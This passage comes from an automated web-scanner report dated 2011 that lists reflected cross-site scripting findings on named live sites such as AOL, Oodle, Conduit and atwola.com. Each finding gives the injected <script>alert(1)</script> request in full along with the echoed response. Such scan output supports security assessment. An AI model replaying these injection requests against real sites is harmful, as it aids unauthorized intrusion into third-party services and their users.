P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Thu, 05 May 2011 10:52:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=2185e70315ab611df10e714ffdfebac5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=b8aabdc0f23d046c06b479adb5ae1264; path=/; domain=.oodle.com
Set-Cookie: a=dT1EMjEwMzc1MjREQzI4MTgy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEyOiJyZW50ZWRzcGFjZXMiO3M6MTI6InJlbnRlZHNwYWNlcyI7czoxMDoiX3RpbWVzdGFtcCI7aToxMzA0NTkyNzcwO30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7TjtzOjc6ImNvdW50cnkiO3M6MzoiVVNBIjtzOjk6InJlZ2lvbl9pZCI7czozOiIzMDQiO3M6OToiY2l0eV9jb2RlIjtOO3M6Njoib3JpZ2luIjtzOjU6ImNhY2hlIjt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Content-Length: 216655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://apartments.oodle.com/?b68bb"><script>alert(1)</script>17755f1e103=1" />
...[SNIP]...

5.34. http://apartments.rentedspaces.oodle.com/ [post_redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apartments.rentedspaces.oodle.com
Path:   /

Issue detail

The value of the post_redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d1e"><script>alert(1)</script>0a65c36f3ad was submitted in the post_redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?post_redirect=193d1e"><script>alert(1)</script>0a65c36f3ad HTTP/1.1
Host: apartments.rentedspaces.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
X-ODL-Server: c3VsdQ==
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Thu, 05 May 2011 13:03:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=228eb9f281eb0d14a0310b873592e387; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=0831ab39f0c8bd5528ecac12eea81fe6; path=/; domain=.oodle.com
Set-Cookie: a=dT1ENzc5QTI2RjREQzJBMDE2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEyOiJyZW50ZWRzcGFjZXMiO3M6MTI6InJlbnRlZHNwYWNlcyI7czoxMDoiX3RpbWVzdGFtcCI7aToxMzA0NjAwNTk4O30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7TjtzOjc6ImNvdW50cnkiO3M6MzoiVVNBIjtzOjk6InJlZ2lvbl9pZCI7czozOiIzMDQiO3M6OToiY2l0eV9jb2RlIjtOO3M6Njoib3JpZ2luIjtzOjU6ImNhY2hlIjt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Content-Length: 222672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://apartments.oodle.com/?post_redirect=193d1e"><script>alert(1)</script>0a65c36f3ad" />
...[SNIP]...

5.35. http://api.screenname.aol.com/auth/getToken [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/getToken

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 54dab<script>alert(1)</script>4f3d94004bb was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auth/getToken?devId=ao17McU4gORZ7DqV&attributes=displayName,loginId,profileUrl,pictureUrl,providerStr,providerDisplayName&f=json&c=jsonp130457501134354dab<script>alert(1)</script>4f3d94004bb HTTP/1.1
Host: api.screenname.aol.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575010062-Repeat%7C1367647010062%3B%20s_nrgvo%3DRepeat%7C1367647010064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:59 GMT
Set-Cookie: JSESSIONID=786625853431F338BA8AD4E06AC98398; Path=/auth
Set-Cookie: OASC=diAxLjAgayAwIFpoakMzOGxtK2l2TTREVGhxaVlnSE8vdVhtTT0%3D-SSQdmqasJXW7AratTMW0EY3204%2BolSyJ67U1vJszd1noF40Fu%2FJMgOz%2FgzlQ4T4HfJQB7UBTF4I%3D; Path=/; HTTPOnly
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 130

jsonp130457501134354dab<script>alert(1)</script>4f3d94004bb({"response": {"statusCode": 400, "statusText": "Invalid callback"}});

5.36. https://api.screenname.aol.com/auth/getToken [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://api.screenname.aol.com
Path:   /auth/getToken

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 2c3af<script>alert(1)</script>07af1547688 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auth/getToken?devId=ru1m1hWVLRPqEkwX&f=json&c=doGetToken.gotToken2c3af<script>alert(1)</script>07af1547688 HTTP/1.1
Host: api.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=BBF9B7FB9E26D8ED033DC7F99C6FF372; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; OASC=diAxLjAgayAwIEtka21Cc09VUUtRRGRQRCtGZ1lUMG9KeWU5OD0%3D-SSQdmqasJXW7AratTMW0EQEWTMe1VUR5nhDclcT%2FxS5anlWsRZrQQVYOAITNhFUURd6bocJQ7JlhxqVytjSx4wPs6vBqi04y; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 13:01:47 GMT
Set-Cookie: JSESSIONID=1B31EE08F46C7362825E10413449A1AA; Path=/auth; Secure
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Connection: close

doGetToken.gotToken2c3af<script>alert(1)</script>07af1547688({"response": {"statusCode": 400, "statusText": "Invalid callback"}});

5.37. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.conduit-banners.com
Path:   /TechCrunchApp-Techcrunch_APP

Issue detail

The value of the imageurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1dd1'%3balert(1)//12dd62a0907 was submitted in the imageurl parameter. This input was echoed as f1dd1';alert(1)//12dd62a0907 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TechCrunchApp-Techcrunch_APP?appid=0b9c9103-d379-409d-9edb-54745461fe64&script=togo&type=1&imageurl=http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.giff1dd1'%3balert(1)//12dd62a0907&supportedonly=1 HTTP/1.1
Host: apps.conduit-banners.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 05 May 2011 00:59:49 GMT
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 4680

function imgToGoOnLoad__1312324258(imgObj) {var elm = imgObj,func__1312324258 = function(){
SharedItems.Togo.Manager.createItem('0b9c9103-d379-409d-9edb-54745461fe64','','2523688','TechCrunch-Ap
...[SNIP]...
<img style="cursor: pointer; visibility: visible;" src="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.giff1dd1';alert(1)//12dd62a0907" title="Grab an app for your browser" alt="Techcrunch News" border="0" onload="imgToGoOnLoad__1312324258(this);" >
...[SNIP]...

5.38. http://apps.conduit.com/TechCrunch_App-Techcrunch_News [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://apps.conduit.com
Path:   /TechCrunch_App-Techcrunch_News

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4163b'a%3d'b'ed58c988a40 was submitted in the REST URL parameter 1. This input was echoed as 4163b'a='b'ed58c988a40 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /TechCrunch_App-Techcrunch_News4163b'a%3d'b'ed58c988a40?appid=0b9c9103-d379-409d-9edb-54745461fe64&source=8&displaytype=togo HTTP/1.1
Host: apps.conduit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:02:03 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Length: 15083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type='text/javascript' src='http://apps.conduit.com/TechCrunch_App-Techcrunch_News4163b'a='b'ed58c988a40?appid=0b9c9103-d379-409d-9edb-54745461fe64&source=8&displaytype=togo&script=1&loggeronly=1&itemsource=1'>
...[SNIP]...

5.39. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload f7d49<script>alert(1)</script>573fa588bae was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf7d49<script>alert(1)</script>573fa588bae&n=ar_int_p97174789&1304575029874 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p97174789=exp=34&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 5 00:56:58 2011&prad=253735228&arc=178115060&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304557020%2E283%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:57:18 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractionf7d49<script>alert(1)</script>573fa588bae("");

5.40. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e9d8"><script>alert(1)</script>2b33d8fc33c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe1e9d8"><script>alert(1)</script>2b33d8fc33c/3.0/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn1e9d8"><script>alert(1)</script>2b33d8fc33c/3.0/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.41. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc88c"><script>alert(1)</script>11931b329c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0fc88c"><script>alert(1)</script>11931b329c4/5113.1/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0fc88c"><script>alert(1)</script>11931b329c4/5113.1/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.42. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68953"><script>alert(1)</script>6729eb7dd53 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.168953"><script>alert(1)</script>6729eb7dd53/221794/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.168953"><script>alert(1)</script>6729eb7dd53/221794/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc56b"><script>alert(1)</script>f3885e3ce75 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794cc56b"><script>alert(1)</script>f3885e3ce75/0/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794cc56b"><script>alert(1)</script>f3885e3ce75/0/-1/size=300x250;adiframe=y">
...[SNIP]...

5.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aa31"><script>alert(1)</script>17fbae92a91 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/04aa31"><script>alert(1)</script>17fbae92a91/-1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/04aa31"><script>alert(1)</script>17fbae92a91/-1/size=300x250;adiframe=y">
...[SNIP]...

5.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9c97"><script>alert(1)</script>d52ab365ef1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1c9c97"><script>alert(1)</script>d52ab365ef1/size=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1c9c97"><script>alert(1)</script>d52ab365ef1/size=300x250;adiframe=y">
...[SNIP]...

5.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4de"><script>alert(1)</script>118786fa1f1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size7b4de"><script>alert(1)</script>118786fa1f1=300x250 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size7b4de"><script>alert(1)</script>118786fa1f1=300x250;adiframe=y">
...[SNIP]...

5.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b2c3"><script>alert(1)</script>8a7aa19fc65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?3b2c3"><script>alert(1)</script>8a7aa19fc65=1 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
